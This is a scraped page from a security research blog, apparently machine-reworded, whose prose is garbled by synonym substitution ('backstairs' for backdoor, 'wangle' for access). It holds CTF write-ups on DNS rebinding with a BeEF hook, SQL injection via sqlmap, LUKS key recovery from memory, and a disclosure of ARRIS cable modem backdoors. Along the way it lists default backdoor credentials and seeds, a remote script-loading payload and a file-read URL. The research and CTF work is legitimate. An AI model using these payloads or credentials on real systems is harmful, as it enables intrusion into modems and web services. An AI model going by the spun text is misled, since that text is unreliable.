w00tsec.blogspot.com - Older Posts

w00tsec

W00tsec.blogspot.com Spined HTML

w00tsec w00tsec embedded device & webapp hacking Sunday, March 13, 2016 0CTF 2016 Write Up: Monkey (Web 4) The Chinese 0CTF took place on March 12-13 and it was yet flipside fun CTF. I played with my teammates from TheGoonies and we were ranked #48. I found the Web task "Monkey" particularly interesting: I solved it with the help from my friend @danilonc, but it took way longer than it should considering of some **Spoiler Alert** DNS glitches. According to the scoreboard status, approximately 35 teams were worldly-wise to solve it. Task: Monkey (Web - 4pts) What is Same Origin Policy? you can test this problem on your local machine http://202.120.7.200 The running using receives a Proof-of-Work string and an wrong-headed URL, instructing a "monkey" to scan the inputted URL for 2 minutes. Proof-of-Work Solving the proof-of-work is pretty straightforward. We had to generate random strings and compare the first 6 chars from its MD5 versus the challenge. The POW rencontre was increasingly cpu-intensive than normal, so the traditional bash/python one-liner ctf scripts would require some performance improvements. @danilonc had written a quick hack using Go to bruteforce and solve POW from older CTF challs, so we just slightly modified it: Solving the Proof-of-Work: Same-Origin-Policy and CORS The Same-Origin-Policy (SOP) deems pages having the same URI scheme, hostname and port as residing at the same-origin. If any of these three nature varies, the resource is in a variegated origin. Hence, if provided resources come from the same hostname, scheme and port, they can interact without restriction. If you try to use an XMLHttpRequest to send a request to a variegated origin, you can’t read the response. However, the request will still victorious at its destination. This policy prevents a malicious script on one page from obtaining wangle to sensitive data (both the header and the body) on flipside web page, on a variegated origin. For this particular CTF challenge, if the secret internal webpage had had an insecure CORS header like "Access-Control-Allow-Origin: *", we would be worldly-wise to retrieve its data with no effort. This, of course, was not the case. Bypassing the Same-Origin The flag was wieldy on an internal webserver hosted at http://127.0.0.1:8080/secret. The first thing we did was hooking the monkey's browser using BeEF, so we could fingerprint his device, platform, plugins and components. There was nothing interesting here, a custom user-agent and no known vulnerable component. We enumerated the chars wonted by the server with the pursuit script: Unfortunately, the server was rejecting special chars like spaces (%20 and +) and there was no writ injection signal. Our evil plan to input --disable-web-security $URL to disable Chrome's SOP didn't work so we had to find new ways to retrieve the secrets. We moreover thought well-nigh using data:uri and file schemes to load a malicious script/webpage, but it wouldn't help us to shirk the SOP. We tried to input URL's like <html><script/**/src='http://www.example.com:8000/hook.js'></script></html> and file:///proc/self/environ (setting custom headers with a malicious HTML), but that is moreover known not to work on modern browsers. DNS RebindingWithoutsome discussion, we came to the conclusion that we needed to perform a DNS Rebinding attack. devttys0 presented well-nigh this matriculation of vulnerabilities at DEFCON 18 and @mikispag recently wrote a detailed post describing how to use DNS rebinding to steal WiFi passwords. DNS rebinding is a technique that can be used to perform a violate of same-origin restrictions, enabling a malicious website to interact with a variegated domain. The possibility of this wade arises considering the segregations in the SOP are based primarily on domain name and port, whereas the ultimate wordage of HTTP requests involves converting domain names into IP addresses. We had some issues at first considering we tried to use the self-ruling DNS service from DuckDNS and it was very glitchy. For some obscure reason, we were unable to vaccinate the user's browser when using the service. In order to make our life miserable, the rencontre monkey would scan the site for two minutes only: we moreover could't use the DNS services from Namecheap considering the minimum TTL time is 60 seconds.WadePhaseWithoutdeciding to set up the DNS server on our own, we came with the pursuit wade scenario: 1) User visits the whinge vaccinate page at http://ctf.example.com:8080 (IP 1.2.3.4). 2) Webpage will load BeEF javascript vaccinate and his browser will wilt a zombie. 3) We perform a DNS Rebind to transpiration the A Record from 1.2.3.4 to 127.0.0.1. @danilonc set the BIND Zone file with a low TTL (1 sec) and replaced the wordplay (lines 14-15) as soon as the browser got hooked. 4) Perform a CORS request using BeeF's "Test CORS Request" module. Here's a small diagram of the attack:Withouta couple of tries we finally managed to get the flag: Flag: 0ctf{monkey_likes_banananananananaaaa} Posted by Bernardo Rodrigues at 9:01 PM 2 comments: Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest Labels: beef, bypass, ctf, dns, rebinding, web Thursday, November 19, 2015 ARRISSubscriptionModem has aBackstairsin theBackstairsA couple of months ago, some friends invited me to requite a talk at NullByte Security Conference. I started to study well-nigh some embedded device junk hacking hot topics and decided to talk well-nigh subscription modem security. Braden Thomas keynoted at Infiltrate 2015 discussing well-nigh Practical Attacks on DOCSIS so, yeah, subscription modem hacking is still mainstream. On November 21st I'll be at Salvador speaking on "Hacking subscription modems: The Later Years". It's not a talk well-nigh theft of service and getting self-ruling Internet access. I'll focus on the security of the subscription modems, the technology used to manage them, how the data is protected and how the ISPs upgrade the firmwares. Spoiler Alert: everything's really really bad. Securing subscription modems is increasingly difficult than other embedded devices because, on most cases, you can’t segregate your own device/firmware and software updates are scrutinizingly entirely controlled by your ISP. While researching on the subject, I found a previously undisclosed backstairs on ARRIS subscription modems, well-expressed many of their devices including TG862A, TG862G, DG860A. As of this writing, Shodan searches indicate that the backstairs affects over 600.000 externally wieldy hosts and the vendor did not state whether it's going to fix it yet. ARRIS Backdoors ARRIS SOHO-grade subscription modems contain an undocumented library (libarris_password.so) that acts as a backdoor, permitting privileged logins using a custom password. The pursuit files load the backstairs library on ARRIS TG862A Firmware TS0705125D_031115_MODEL_862_GW (released on 2015): /usr/sbin/arris_init /usr/sbin/dimclient /usr/sbin/docsis_mac_manager /usr/sbin/ggncs /usr/sbin/gw_api /usr/sbin/mini_cli /usr/sbin/pacm_snmp_agent /usr/sbin/snmp_agent_cm /usr/www/cgi-bin/adv_pwd_cgi /usr/www/cgi-bin/tech_support_cgi ARRIS password of the day is a remote backstairs known since 2009. It uses a DES encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily backstairs password. The default seed is MPSJKMDHAI and guess what - many ISPs won't scarecrow waffly it at all. The backstairs worth can be used to enable Telnet and SSH remotely via the subconscious HTTPLegalisticinterface "http://192.168.100.1/cgi-bin/tech_support_cgi" or via custom SNMP MIBs. The default password for the SSH user 'root' is 'arris'. When you wangle the telnet session or demonstrate over SSH, the system spawns the 'mini_cli' shell asking for the backstairs password. When you log using the password of the day, you are redirected to a restricted technician shell ('/usr/sbin/cli') Restricted shells are ;restricted In order to understand how the backstairs works, I built an Puma5 toolchain (ARMEB) and navigate compiled some useful tools like strace, tcpdump and gdbserver. I hosted them on my Github, get them here: - https://github.com/bmaia/cross-utils/tree/master/armeb While analyzing the backstairs library and the restricted shells, I found an interesting lawmaking on the hallmark check: Yes, they put a backstairs in the backstairs (Joel from Dlink is sure to be envy). The undocumented backstairs password is based on the last five digits from the modem's serial number. You get a full busybox shell when you log on the Telnet/SSH session using these passwords. The vendor asked not to unroll details well-nigh the password generation algorithm. I'm really relieved knowing that those villainous guys from Metasploit won't be worldly-wise to reverse this in a timely manner. Vulnerability, Disclosure and Marketing Of course, we need a logo so the media can report well-nigh this with fancy graphs as well as vendors could distribute customized t-shits at Blackhat. What I like most well-nigh lcamtuf is how visionary he is. While people were still writing dumb fuzzers, he wrote AFL performed a detailed Technical wringer of Qualys' GHOST. Based on his analysis, I hired a couple of marketing specialists to find out the weightier way to unroll the ARRIS backdoor. What do we have here? - Multiple backdoors permitting full remote wangle to ARRISSubscriptionmodems - An wangle key that is generated based on theSubscriptionmodem's serial numberWithouta thoughtful analysis, the marketing committee well-considered w00tsec members to write a Keygen. In order to write a Keygen, we need a leet ascii art and a tomfool chiptune. The chosen font was ROYAFNT1.TDF, from the legendary versifier Roy/SAC and the chiptune is Toilet Story 5, by Ghidorah. Here's the POC (make sure you turn the sound on): Conclusion I reported these flaws to CERT/CC on 2015-09-13 but we didn't receive much feedback from the vendor. CERT/CC was very helpful and responsive (10/10 would unroll again!). I was asked not to release the POCs immediately so I'm going to wait for the vendor to "fix" the issue. CERT/CC set a disclosure policy of 45 days long ago. They waited for increasingly than 65 days for them to "fix" it but ARRIS didn't remove the backdoors in a timely manner. Someone needs to update the Responsible Disclosure RFC and include a note describing that vendors shall lose disclosure points whenever they plant a backstairs on the device (ARRIS modems have a third backstairs too, trammels the ConsoleCowboys Blog). I'm pretty sure bad guys had been exploiting flaws on these devices for some time (just search for ARRIS DNS on Twitter, for example). We need increasingly people bypassing EULAs and reversing end-user software and firmware. If you haven't heard well-nigh the Firmware.RE, trammels them right now. A broader view on firmwares is not only beneficial, but necessary to discover new vulnerabilities and backdoors, correlating variegated device families and showing how vulnerabilities reappear wideness variegated products. To all the vendors out there, I would like to finish this post by quoting @daveitel: Posted by Bernardo Rodrigues at 11:07 AM 168 comments: Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest Labels: arris, backdoor, subscription modem, firmware, nullbyte, tg862 Thursday, October 22, 2015 Hack.lu 2015 CTF Write Up: Dr. Bob (Forensic 150) Hack.lu 2015 CTF was organised by fluxfingers during October 20-22. It's one of the coolest CTFs around, the only drawback is that it runs during week days (hey guys patch this for the next years). My team TheGoonies ranked #59th, which is not bad considering we only played part-time. The task Dr. Bob was the one I found most interesting as it included disk forensics, memory forensics and vital crypto tasks. Task: Dr. Bob (Forensic 150) There are elections at the moment for the representative of the students and the winner will be spoken tomorrow by the throne of elections Dr. Bob. The local schoolyard gang is gambling on the winner and you could really use that uneaten cash. Luckily, you are worldly-wise to hack into the mainframe of the school and get a reprinting of the virtual machine that is used by Dr. Bob to store the results. The desired information is in the file /home/bob/flag.txt, easy as that. Download: dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz The file provided is a VirtualBox image in a saved state. According to the rencontre instructions, we have to retrieve the flag from the user home folder. The VM starts on a login terminal of what seems to be a Linux distro. The easiest route here is to convert the VDI image to raw, mount and pericope the key from the home folder. VirtualBox has a builtin tool to convert VDI to raw and it's as simple as: C:\Program Files\Oracle\VirtualBox\VBoxManage.exe internalcommands converttoraw c:\ctf\home\dr_bob\.VirtualBox\Safe\Safe.vdi c:\ctf\safe.dd Let's identify the raw image and mount it externally: sudo fdisk -lu safe.dd sudo losetup -o 1048576 /dev/loop0 safe.dd sudo lvmdiskscan There are two interesting devices: /dev/vg/root and /dev/vg/home, let's 1 - mount the home folder, 2 - grab the flag and 3 - PROFIT!!! Oh noes, the disk is encrypted... I couldn't find any useful data on the root device (/dev/vg/root). I tried to one-liner some local password hashes but I didn't get anything and logs/history files didn't reveal any secrets. Time to unleash some CSI skills and perform live memory forensics. Memory Forensics: Rekall Unlike VMWare virtual machines, VirtualBox does not offer an easy-to-use memory dump (as far as I know). What do we do now? It's time to perform VM introspection with Rekall. MemoryWringerInception Rekall is the first memory framework to support transparent introspection of VMs with any host-guest OS combination and is self-sustaining of the virtualization software layer. Building the Profile Linux support in Rekall requires a tailoured profile to the running kernel as well as the System map file. The profile file contains all the debugging symbols extracted into a Rekall standard profile format. To generate this file, it is necessary to build a kernel module with debugging symbols enabled, and then parse the DWARF debugging symbols. The operating system is a Debian 7.9 i686, with 3.2.0-4-486 Kernel. The Linux Guide from rekall repository is pretty straightforward. I downloaded a Debian 7.9 i386 ISO, installed it on a wipe system, installed the Kernel headers from the target VM and built the respective profiles. I mirrored them here: https://github.com/bmaia/rekall-profiles MemoryWringerInception Now that we have the proper profile, we can run VirtualBox, start the VM and perform live forensics on the guest machine. The vmscan plugin scans the physical memory attempting to find hypervisors and group them together logically as virtual machines. It's possible to run plugins on any VM by using the --ept (Extended Page Tables) parameter on the writ line. To run a rekall plugin on a VM that vmscan found, invoke rekall as you normally would, but add --ept EPT_VALUE as a parameter. rekal -f \\.\pmem vmscan --live rekal.exe -f \\.\pmem --profile Debian-3.2.0-4-486.zip --ept 0x1ECC0701E I tried to use the wiring Plugins that supports Linux analysis, but none of them revealed the secrets necessary to decrypt the disk.Withoutsome time I decided to take a variegated tideway and dump the full memory from the Guest VM and whittle for some secrets. imagecopy output_image='memdump.raw' Extracting AES Keys from the Memory Dump You can use tools like bulk_extractor and findaes to pericope AES keys from memory dumps. These programs work by scarification the images and eliminating anything which is not a valid AES key schedule. ./findaes memdump.raw The tools found an AES-128 key, and I now needed to recreate this policies on a lab to make sure that it was the encryption master-key. I set up an encrypted volume on a Debian installation and dumped the master keys using cryptsetup: cryptsetup luksDump --dump-master-key /dev/sda5Withoutthat, I dumped the operating system memory and used bulk_extractor to search for AES Keys: bulk_extractor memdump.raw The AES256 key matches with the MK dump, what brings us to the final step. Decrypting LUKS volume using the Master Key Now that we have the AES Key, all we need to do is follow this guide - Cryptsetup and the master key - and decrypt '/dev/vg/home'. There's no command-line to decrypt the disk using the master-key, everything is kind of hackish (you need to untruthful the headers and create a new one using the key). sudo losetup -o 1048576 /dev/loop1 safe.dd cryptsetup -v luksDump /dev/vg/home The Master Key (MK) has 128 bits, which is a good sign. The payload offset is 2048 and we need to do some vital math here to get the LUKS header size: 2048 * 512 / 1024 = 1024 (fdisk -l shows that the cluster size is 512 bytes). We now proceed to write a new LUKS header on the device using the extracted MK, assigning a new passphrase: dd if=/dev/vg/home of=test.img hexdump -C -n 80 test.img dd if=/dev/zero of=test.img conv=notrunc bs=1024 count=1 hexdump -C -v -n 80 test.img reverberate 1fab015c1e3df9eac8728f65d3d16646 | xxd -r -p > key.bin cryptsetup luksFormat --verify-passphrase --cipher=aes-ecb --hash=sha1 --key-size=128 --master-key-file=key.bin test.img They tried to hibernate the flag from "/bin/cat" using the transport return char (0x0D), but hexdump and Pluma had no problems displaying it:                               Flag: flag{v0t3_f0r_p3dr0} Update 1: @rbaranyi and David Berard pointed out that replacing '/etc/shadow', login with the known password and then use 'strings /dev/lvm' would be easier. That's true, but that wouldn't involve any kind of memory inception. Update 2: David Berard pointed out that newer 'cryptsetup' offers an option to set a new passphrase using the master key: 'cryptsetup luksAddKey --master-key-file=<master-key-file> <luks device>' Update 3: According to the writeup from CLGT, you can moreover dump  VirtualBox RAM using this legalistic command: 'VBoxManage debugvm SafeClone dumpvmcore --filename=getthekey' Update 4: Some teams used the dm_dump volatility plugin: it identifies disks on the target system which were mounted using the device-mapper framework. The output of this plugin gives you the arguments to pass to the dmsetup writ to remount the original unencrypted file system on a variegated machine. Posted by Bernardo Rodrigues at 6:02 AM 4 comments: Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest Labels: aes, ctf, forensic, hacklu2015, luks, rekall Wednesday, October 7, 2015 Mac OS X 10.11 Partial Lock ScreenShirkLock screen bypasses are rhadamanthine mainstream. The most notable recent bypasses are the one from Ubuntu 14.04 (hold enter, lock screen crashes, computer unlocked) and the one from Android 5.x (input large strings in the password field, destabilize the lock screen, crash to the home screen). Many respected researcher had found and published something well-nigh this matriculation of bugs and this blog is no different: this post describes a completely useless super serious vulnerability well-expressed Mac OS X 10.11 and earlier. Mac OS X 10.11 Partial Lock ScreenShirkMac OS X 10.11 (and probably older versions) are vulnerable to a partial lock screen bypass. This is not a *complete* lock screen shirk as you won't be worldly-wise to freely interact with the Desktop (as far as I know). Here are the steps to reproduce this bug: 1 - Hit the Exposé Key (F3) 2 - Click on any window and alimony holding it 3 -Alimonyholding the left mouse sawed-off and lock the screen usingWrit+ Option + Eject (hold all these keys together for some time) That's it, now the lock screen has an "extra layer" with the miniaturised desktop windows. If you move the mouse cursor over the correct using position and hit the Space Key, a worthier window will be displayed. You can watch Youtube videos and interact with media players (Quicktime, Spotify etc) using the media tenancy keys. You can't interact directly with the app: if you left-click on the windows or hit Enter, the lock screen takes over that invisible layer. Proof-of-concept - Mac OS X 10.11: If Youtube is blocking the video in your country, watch it here: If you are a serious tech journalist reporting well-nigh this bug feature, don't forget to say that this is specially useful to play Youtube and Spotify playlists during parties at a friend's house. You don't want to leave you Mac logged in and unattended, so you simply preload the playlist and lock the screen using this tomfool technique. Bonus: Mac OS X 10.11SubconsciousWindow Bug This is yet flipside useless totally serious bug well-expressed the new Mac OS X El Capitain. You can hibernate an using window from the user by moving them to flipside exhibit and successive the screen mirroring options. Here are the steps to reproduce this bug: 1 - Connect your monitor to an external exhibit ("Use As Separate Display") 2 - Move the window you want to hibernate to the secondary exhibit 3 - Hit the Exposé Key (F3), move the mouse cursor over the window you want to hibernate and hit the Space Key. 4 - Alternate the screen mirroring options by inputtingWrit+ F1 5 - The window is gone (OMGBBQ!!!) Proof-of-concept - Mac OS X 10.11: I personally use this to hibernate all the Mac applications from coworkers who leave their computers unlocked and unattended. Posted by Bernardo Rodrigues at 11:18 AM 1 comment: Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest Labels: apple, bypass, elcapitain, fail, lockscreen, macosx Sunday, September 20, 2015 CSAW CTF 2015 Write Up: Weebdate (web500) The anual CSAW CTF Qualification Round took place on September 18-20 and it was yet flipside really tomfool CTF. I played with my friends from TheGoonies and we ranked #128 overall (The Goonies 'R' Good Enough). Task - Weebdate (web500) Since the Ashley Madison hack, a lot of upper profile socialites have scrambled to find the hottest new dating sites. Unfortunately for us, that ways they're taking increasingly safety measures and only using secure websites. We have some suspicions that Donald Trump is using a new dating site tabbed "weebdate" and moreover selling cocaine to fund his presidential campaign. We need you to get both his password and his 2 factor TOTP key so we can unravel into his profile and investigate. Flag is md5($totpkey.$password) http://54.210.118.179/ This is a vital Flask using running a dating site. The website has some features like most web applications we are used to: creating users, editing profiles, sending messages, searching users and exposing the whole consumer data thourgh SQL Injection and LFI. SQLi The CSP reporting URI was vulnerable to SQL injection. SQLmap had no problems finding and exploiting it. python sqlmap.py -u 'http://54.210.118.179:80/csp/view/1' --cookie='session=donaldtrump010_1442717300_f65cb746b519c2b49f8e938a896e08e96f5fc533' --dbms=mysql --batch The 'weeb' database had three tables: messages, reports and users. The 'user' table had eight columns: user_id, user_name, user_password, user_ip, user_image, user_credits, user_register_time and user_profile. Passwords had a SHA256 pattern so I quickly started cracking them using John The Ripper: john --format=raw-sha256 hash.txt --wordlist=rockyou.txt Most croaky passwords had patterns like 'testtest', 'lablab' and 'guest1guest1'.Withoutsome time I realised that the username was used as a Salt. I generated a small wordlist concatenating donaldtrump's user and password and I finally managed to one-liner it: The login form displays "Invalid verification code" when you type a wrong TOTP verification lawmaking and it returns "Invalid credentials" when you mistype the password. I knew that his password was 'zebra' but I still needed to find out the TOTP algorithm in order to steal his seed. LFI The 'image_url' parameter from '/profile/edit' was vulnerable to LFI, displaying the full content from local files: A curious note here is that it was the first time I managed to find a bug using Burp Collaborator. The scanner identified the external HTTP/DNS interaction and without some digging I quickly found the LFI =)Withoutsome a lot of time bruteforcing the dirs and files, we managed to find the server root: We are particularly interested on the generate_seed() function: - server.py - utils.py The TOTP is not stored server-side: it is generated at runtime using a seed based on the username and his registration IP Address. We had the user IP write from the SQLi dump and we can now use the get_otp_key() function to generate his TOTP key: The flag is the md5($totpkey.$password): a8815ecd3c2b6d8e2e884e5eb6916900 Posted by Bernardo Rodrigues at 7:30 PM 1 comment: Email ThisBlogThis!Share to TwitterShare to FacebookShare to Pinterest Labels: csaw-2015, ctf, lfi, sqlinjection, web Newer Posts Older Posts Home Subscribe to: Posts (Atom) ABOUT ME Bernardo Rodrigues Twitter @bernardomr Blog Archive ▼  2018 (1) ▼  April (1) Abusing MySQL LOCAL INFILE to read vendee files ►  2016 (2) ►  September (1) ►  March (1) ►  2015 (6) ►  November (1) ►  October (2) ►  September (1) ►  February (2) ►  2014 (7) ►  November (1) ►  October (1) ►  August (1) ►  July (2) ►  March (1) ►  February (1) ►  2013 (5) ►  December (1) ►  November (1) ►  September (1) ►  August (2) Links TheGoonies CTF BlahCat 4 Lyfe ADS ADS Picture Window theme. Powered by Blogger.